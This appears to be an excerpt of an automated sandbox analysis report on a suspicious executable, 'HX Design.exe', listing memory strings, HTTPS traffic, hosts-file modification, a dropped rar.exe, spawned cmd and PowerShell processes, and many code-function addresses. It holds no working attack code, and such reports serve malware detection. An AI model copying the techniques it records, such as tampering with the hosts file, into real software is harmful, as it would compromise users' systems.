Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929899175.000076D80030C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1925527221.000076D8000A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931020415.000076D8003D4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929221857.000076D8002B4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928592843.000076D800228000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929816645.000076D8002F4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929153808.000076D8002B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928665494.000076D800234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000003A.00000002.1925562449.00002F0400164000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0(p
Source: chrome.exe, 0000003A.00000002.1929650612.00002F040036C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1929899175.000076D80030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/8
Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/CharC
Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/ngType
Source: chrome.exe, 0000003A.00000002.1928433733.00002F0400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sibilityChangedWebContentsObserver.OnVisibilityChanged
Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/v
Source: chrome.exe, 0000003A.00000002.1917350022.000001C518090000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1917774956.00000143C5200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comC:
Source: chrome.exe, 0000003A.00000002.1931983155.00005F5800236000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comH
Source: msedge.exe, 0000003B.00000002.1921738447.00004C68002B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comLh
Source: msedge.exe, 0000003B.00000002.1920928232.00004C6800238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comLh#
Source: msedge.exe, 0000003B.00000002.1922367140.00006FA400238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comP
Source: msedge.exe, 0000003B.00000002.1923306413.00006FA400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comx
Source: HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2106274168.00007FFDFB2AA000.00000004.00000001.01000000.00000010.sdmp, HX Design.exe, 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: https://www.python.org/psf/license/)
Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: HX Design.exe, 00000001.00000003.2096001614.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1706357551.00000294B4D1A000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\Desktop\HX Design.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: cmd.exe

Process created: 49

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Code function: 73_2_00007FF77D213A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,

73_2_00007FF77D213A70

Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe

Code function: 73_2_00007FF77D23B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,

73_2_00007FF77D23B57C

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732085C00	0_2_00007FF732085C00
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732086964	0_2_00007FF732086964
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320689E0	0_2_00007FF7320689E0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732061000	0_2_00007FF732061000
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320808C8	0_2_00007FF7320808C8
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732071B50	0_2_00007FF732071B50
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732083C10	0_2_00007FF732083C10
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732072C10	0_2_00007FF732072C10
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732086418	0_2_00007FF732086418
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320808C8	0_2_00007FF7320808C8
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73206A474	0_2_00007FF73206A474
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73206ACAD	0_2_00007FF73206ACAD
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732071944	0_2_00007FF732071944
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732072164	0_2_00007FF732072164
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320739A4	0_2_00007FF7320739A4
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73207DA5C	0_2_00007FF73207DA5C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73206A2DB	0_2_00007FF73206A2DB
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732089728	0_2_00007FF732089728
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732071740	0_2_00007FF732071740
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732071F60	0_2_00007FF732071F60
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732078794	0_2_00007FF732078794
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732069800	0_2_00007FF732069800
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732081874	0_2_00007FF732081874
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320840AC	0_2_00007FF7320840AC
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320780E4	0_2_00007FF7320780E4
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732075D30	0_2_00007FF732075D30
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732071D54	0_2_00007FF732071D54
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73207E570	0_2_00007FF73207E570
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320735A0	0_2_00007FF7320735A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732085E7C	0_2_00007FF732085E7C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732079EA0	0_2_00007FF732079EA0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF73207DEF0	0_2_00007FF73207DEF0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732085C00	1_2_00007FF732085C00
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732086964	1_2_00007FF732086964
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732061000	1_2_00007FF732061000
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732071B50	1_2_00007FF732071B50
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732083C10	1_2_00007FF732083C10
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732072C10	1_2_00007FF732072C10
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732086418	1_2_00007FF732086418
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320808C8	1_2_00007FF7320808C8
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73206A474	1_2_00007FF73206A474
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73206ACAD	1_2_00007FF73206ACAD
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732071944	1_2_00007FF732071944
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732072164	1_2_00007FF732072164
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320739A4	1_2_00007FF7320739A4
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320689E0	1_2_00007FF7320689E0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73207DA5C	1_2_00007FF73207DA5C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73206A2DB	1_2_00007FF73206A2DB
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732089728	1_2_00007FF732089728
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732071740	1_2_00007FF732071740
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732071F60	1_2_00007FF732071F60
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732078794	1_2_00007FF732078794
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732069800	1_2_00007FF732069800
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732081874	1_2_00007FF732081874
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320840AC	1_2_00007FF7320840AC
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320808C8	1_2_00007FF7320808C8
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320780E4	1_2_00007FF7320780E4
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732075D30	1_2_00007FF732075D30
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732071D54	1_2_00007FF732071D54
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73207E570	1_2_00007FF73207E570
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320735A0	1_2_00007FF7320735A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732085E7C	1_2_00007FF732085E7C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732079EA0	1_2_00007FF732079EA0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF73207DEF0	1_2_00007FF73207DEF0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFAD90350	1_2_00007FFDFAD90350
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFACE1300	1_2_00007FFDFACE1300
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFACE2270	1_2_00007FFDFACE2270
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFACE1950	1_2_00007FFDFACE1950
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2A9060	1_2_00007FFDFB2A9060
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2F92B0	1_2_00007FFDFB2F92B0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB302250	1_2_00007FFDFB302250
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E9B90	1_2_00007FFDFB2E9B90
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E3C10	1_2_00007FFDFB2E3C10
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB33CC40	1_2_00007FFDFB33CC40
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB372C40	1_2_00007FFDFB372C40
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB31CC59	1_2_00007FFDFB31CC59
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB392BF0	1_2_00007FFDFB392BF0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2FCC40	1_2_00007FFDFB2FCC40
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB344B20	1_2_00007FFDFB344B20
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB336B40	1_2_00007FFDFB336B40
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB34BB00	1_2_00007FFDFB34BB00
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB38FB10	1_2_00007FFDFB38FB10
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3099A0	1_2_00007FFDFB3099A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2EFA10	1_2_00007FFDFB2EFA10
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3918A0	1_2_00007FFDFB3918A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E288E	1_2_00007FFDFB2E288E
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3988D0	1_2_00007FFDFB3988D0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB39A860	1_2_00007FFDFB39A860
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2EA8C0	1_2_00007FFDFB2EA8C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB325880	1_2_00007FFDFB325880
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB342950	1_2_00007FFDFB342950
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2F6930	1_2_00007FFDFB2F6930
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB36BFC0	1_2_00007FFDFB36BFC0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB394FC0	1_2_00007FFDFB394FC0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB38DFE0	1_2_00007FFDFB38DFE0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB307040	1_2_00007FFDFB307040
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB308020	1_2_00007FFDFB308020
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB37CEA0	1_2_00007FFDFB37CEA0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB324E70	1_2_00007FFDFB324E70
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB35CF30	1_2_00007FFDFB35CF30
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB30DDB0	1_2_00007FFDFB30DDB0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2F0DC0	1_2_00007FFDFB2F0DC0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB36ACA0	1_2_00007FFDFB36ACA0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB33BCC0	1_2_00007FFDFB33BCC0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB364C70	1_2_00007FFDFB364C70
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB32BC80	1_2_00007FFDFB32BC80
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB378C80	1_2_00007FFDFB378C80
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2F9D00	1_2_00007FFDFB2F9D00
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2EBD30	1_2_00007FFDFB2EBD30
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3543B0	1_2_00007FFDFB3543B0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2FC380	1_2_00007FFDFB2FC380
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3862A0	1_2_00007FFDFB3862A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3A42B0	1_2_00007FFDFB3A42B0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3972C0	1_2_00007FFDFB3972C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB32F2D0	1_2_00007FFDFB32F2D0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2FD2B0	1_2_00007FFDFB2FD2B0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E32F5	1_2_00007FFDFB2E32F5
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB347350	1_2_00007FFDFB347350
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB30F2F0	1_2_00007FFDFB30F2F0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E7336	1_2_00007FFDFB2E7336
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB36A300	1_2_00007FFDFB36A300
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB30D310	1_2_00007FFDFB30D310
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB38A310	1_2_00007FFDFB38A310
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB38B230	1_2_00007FFDFB38B230
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2F21E0	1_2_00007FFDFB2F21E0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3980B0	1_2_00007FFDFB3980B0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB387060	1_2_00007FFDFB387060
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB36E0F0	1_2_00007FFDFB36E0F0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E4120	1_2_00007FFDFB2E4120
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB34C840	1_2_00007FFDFB34C840
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3527E6	1_2_00007FFDFB3527E6
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E4820	1_2_00007FFDFB2E4820
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3686B0	1_2_00007FFDFB3686B0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3406C0	1_2_00007FFDFB3406C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3996C0	1_2_00007FFDFB3996C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB33E670	1_2_00007FFDFB33E670
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB357750	1_2_00007FFDFB357750
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3115A0	1_2_00007FFDFB3115A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB33B5B0	1_2_00007FFDFB33B5B0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB30E5C0	1_2_00007FFDFB30E5C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E4570	1_2_00007FFDFB2E4570
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3045A0	1_2_00007FFDFB3045A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2F3650	1_2_00007FFDFB2F3650
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB3854A0	1_2_00007FFDFB3854A0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB387460	1_2_00007FFDFB387460
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB2E94D0	1_2_00007FFDFB2E94D0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFB32A510	1_2_00007FFDFB32A510
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFDFBAB33C0	1_2_00007FFDFBAB33C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00355C00	1_2_00007FFE00355C00
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311D93	1_2_00007FFE00311D93
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE003116FE	1_2_00007FFE003116FE
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00318720	1_2_00007FFE00318720
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE0031116D	1_2_00007FFE0031116D
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00388870	1_2_00007FFE00388870
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00348920	1_2_00007FFE00348920
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311EE2	1_2_00007FFE00311EE2
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311618	1_2_00007FFE00311618
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00312617	1_2_00007FFE00312617
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311A0F	1_2_00007FFE00311A0F
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE0038AC80	1_2_00007FFE0038AC80
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE0031149C	1_2_00007FFE0031149C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311CBC	1_2_00007FFE00311CBC
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311B54	1_2_00007FFE00311B54
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE0031117C	1_2_00007FFE0031117C
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00312702	1_2_00007FFE00312702
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE003124DC	1_2_00007FFE003124DC
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE003117F8	1_2_00007FFE003117F8
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE0037D2D0	1_2_00007FFE0037D2D0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00311C12	1_2_00007FFE00311C12
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FFE00383650	1_2_00007FFE00383650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD9A4C3027	8_2_00007FFD9A4C3027
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D21AE10	73_2_00007FF77D21AE10
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D200A2C	73_2_00007FF77D200A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D227B24	73_2_00007FF77D227B24
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FABA0	73_2_00007FF77D1FABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FB540	73_2_00007FF77D1FB540
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1F1884	73_2_00007FF77D1F1884
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1F82F0	73_2_00007FF77D1F82F0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D201180	73_2_00007FF77D201180
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2054C0	73_2_00007FF77D2054C0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D23AE50	73_2_00007FF77D23AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FCE84	73_2_00007FF77D1FCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D208E68	73_2_00007FF77D208E68
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D24FE74	73_2_00007FF77D24FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D23EEA4	73_2_00007FF77D23EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D22AF0C	73_2_00007FF77D22AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1F9EFC	73_2_00007FF77D1F9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D220D20	73_2_00007FF77D220D20
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D239D74	73_2_00007FF77D239D74
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D241DCC	73_2_00007FF77D241DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D201E04	73_2_00007FF77D201E04
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D1FEE08	73_2_00007FF77D1FEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D228040	73_2_00007FF77D228040
